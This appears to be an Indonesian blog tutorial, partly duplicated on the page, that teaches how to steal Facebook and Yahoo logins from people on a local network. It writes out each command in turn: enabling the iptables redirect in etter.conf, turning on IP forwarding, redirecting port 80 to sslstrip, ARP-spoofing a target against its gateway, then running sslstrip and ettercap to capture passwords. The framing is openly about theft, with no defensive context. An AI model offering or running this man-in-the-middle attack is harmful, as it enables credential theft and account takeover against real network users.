Mungkin kalian sudah tau tentang apa itu sniffing, sniffing atau dengan kata lainnya penyadapan paket yang lewat dalam jaringan. jadi ketika user & password yang lewat dalam jaringan bisa berbahaya..... wauuuuu ganas juga yah . berarti kita dapat menyadap (mencuri) user & password (facebook,yahoo,etc) dalam jaringan.
Saya menggunakan OS Backtrack 4 Final dan aplikasi Ettercap, SSLSTRIP, ARPSpoof,IPTABLES jika belum ada silahkan cari di google n download
Ok langsung aja ke Tekniknya :
1. Kopi Cappucino, Rokok Sampoerna, n Koneksi Jaringan dengan kecepatan 1 Gbp/s
2. Edit File /etc/etter.conf
Cari bagian ini
Kemudian Hilangkan tanda # seperti ini :
3. Aktifkan IP Forward
4. Redirect port 80 ke port 10000 (sslstrip)
5. Ok sekarang jalankan ArpSpoofing
Contoh
Target : 192.168.2.105
Gateway : 192.168.2.244
6. Kemudian Jalankan SSLSTRIP
7. Ok langkah Terakhir Jalankan ettercap
Untuk melihat User dan passsword target ketika login (facebook,yahoo,etc) liat pada tab ettercap seperti ini, n jangan di close :
[quote]oot@bt:~# ettercap -T -q -i wlan0
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on wlan0... (Ethernet)
wlan0 -> 00:17:C4:9E:FE:24 192.168.2.108 255.255.255.0
Privileges dropped to UID 65534 GID 65534...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Ok sekian dulu Tutornya, Silahkan dicicipi....
Saya menggunakan OS Backtrack 4 Final dan aplikasi Ettercap, SSLSTRIP, ARPSpoof,IPTABLES jika belum ada silahkan cari di google n download
Ok langsung aja ke Tekniknya :
1. Kopi Cappucino, Rokok Sampoerna, n Koneksi Jaringan dengan kecepatan 1 Gbp/s
2. Edit File /etc/etter.conf
Quote:root@bt:~# kwrite /etc/etter.conf
Cari bagian ini
Quote:# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Kemudian Hilangkan tanda # seperti ini :
Quote:# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
3. Aktifkan IP Forward
Quote:echo 1 > /proc/sys/net/ipv4/ip_forward
4. Redirect port 80 ke port 10000 (sslstrip)
Quote:root@bt:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
5. Ok sekarang jalankan ArpSpoofing
Contoh
Target : 192.168.2.105
Gateway : 192.168.2.244
Quote:root@bt:~# arpspoof -i wlan0 -t 192.168.2.105 192.168.2.244
6. Kemudian Jalankan SSLSTRIP
Quote:root@bt:~# sslstrip -a -k -f
7. Ok langkah Terakhir Jalankan ettercap
Quote:root@bt:~# ettercap -T -q -i wlan0
Untuk melihat User dan passsword target ketika login (facebook,yahoo,etc) liat pada tab ettercap seperti ini, n jangan di close :
[quote]oot@bt:~# ettercap -T -q -i wlan0
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on wlan0... (Ethernet)
wlan0 -> 00:17:C4:9E:FE:24 192.168.2.108 255.255.255.0
Privileges dropped to UID 65534 GID 65534...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Ok sekian dulu Tutornya, Silahkan dicicipi....
Post a Comment Blogger Facebook